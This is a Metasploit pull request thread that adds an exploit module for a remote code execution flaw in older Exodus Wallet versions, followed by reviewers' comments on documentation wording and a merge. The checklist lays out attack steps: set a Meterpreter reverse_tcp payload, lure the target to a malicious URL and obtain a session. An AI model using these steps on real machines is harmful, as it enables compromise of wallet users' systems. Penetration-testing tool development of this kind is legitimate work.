Exodus Wallet Remote Code Execution
rapid7/metasploit-framework pull request #9633
Opened 2018-02-26 21:32 UTC by DanielRTeixeira

This PR adds a module to exploit a remote code execution vulnerability in Exodus Wallet versions 1.8.2-beta.3 and earlier, 1.7.10 and earlier, 1.6.15 and earlier.

- [x] Install the application
- [x] Start `msfconsole`
- [x] `use exploit/windows/browser/exodus`
- [x] `set PAYLOAD windows/meterpreter/reverse_tcp`
- [x] `set LHOST`
- [x] Run
- [x] In the target machine browse to the malicious URL an launch Exodus
- [x] Enjoy your session

2018-02-28 01:37 UTC, h00die requested changes
a few minor doc changes

2018-02-28 01:37 UTC, h00die commented on documentation/modules/exploit/windows/browser/exodus.md
> +
Please add a description of the vuln, where to download it, etc up here.

2018-02-28 01:37 UTC, h00die commented on documentation/modules/exploit/windows/browser/exodus.md
> +7. In the target machine browse to the malicious URL an launch Exodus
In = On

2018-02-28 01:37 UTC, h00die commented on documentation/modules/exploit/windows/browser/exodus.md
> +7. In the target machine browse to the malicious URL an launch Exodus
an = and

2018-02-28 01:37 UTC, h00die commented on documentation/modules/exploit/windows/browser/exodus.md
> +7. In the target machine browse to the malicious URL an launch Exodus
machine,

2018-02-28 01:37 UTC, h00die commented on documentation/modules/exploit/windows/browser/exodus.md
> +# Exodus Wallet on Windows 7 SP1
Please add the version of exodus wallet to the header.  It should also be 3 levels deep not 1 (```###```)

2018-02-28 01:37 UTC, h00die commented on modules/exploits/windows/browser/exodus.rb
> +      OptBool.new('PSH-Proxy',            [ true,  'PSH - Use the system proxy', true ]),
maybe not so many spaces are needed here?

2018-03-01 20:22 UTC, DanielRTeixeira commented on documentation/modules/exploit/windows/browser/exodus.md
> +
Done.

2018-03-22 14:34 UTC, DanielRTeixeira commented on documentation/modules/exploit/windows/browser/exodus.md
> +
Hi h00die all the changes requested were made, is there anything else missing?

2018-03-23 00:12 UTC, h00die approved these changes

2018-03-23 00:13 UTC, h00die commented
@wchen-r7 is the reviewer for this.  If he doesn't get to it in a few days I'll give it a go.  Currently moving my entire architecture into a new rack, so my network and servers are all down at the moment.

2018-03-27 17:52 UTC, wchen-r7 commented
ah, thanks for the reminder. Ooops, sorry!

2018-03-27 19:50 UTC, wchen-r7 commented
Works for me.

2018-03-27 19:52 UTC, merged

2018-03-27 19:52 UTC, wchen-r7 commented
# Release Notes

This PR adds a module to exploit a remote code execution vulnerability in Exodus Wallet versions 1.8.2-beta.3 and earlier, 1.7.10 and earlier, 1.6.15 and earlier.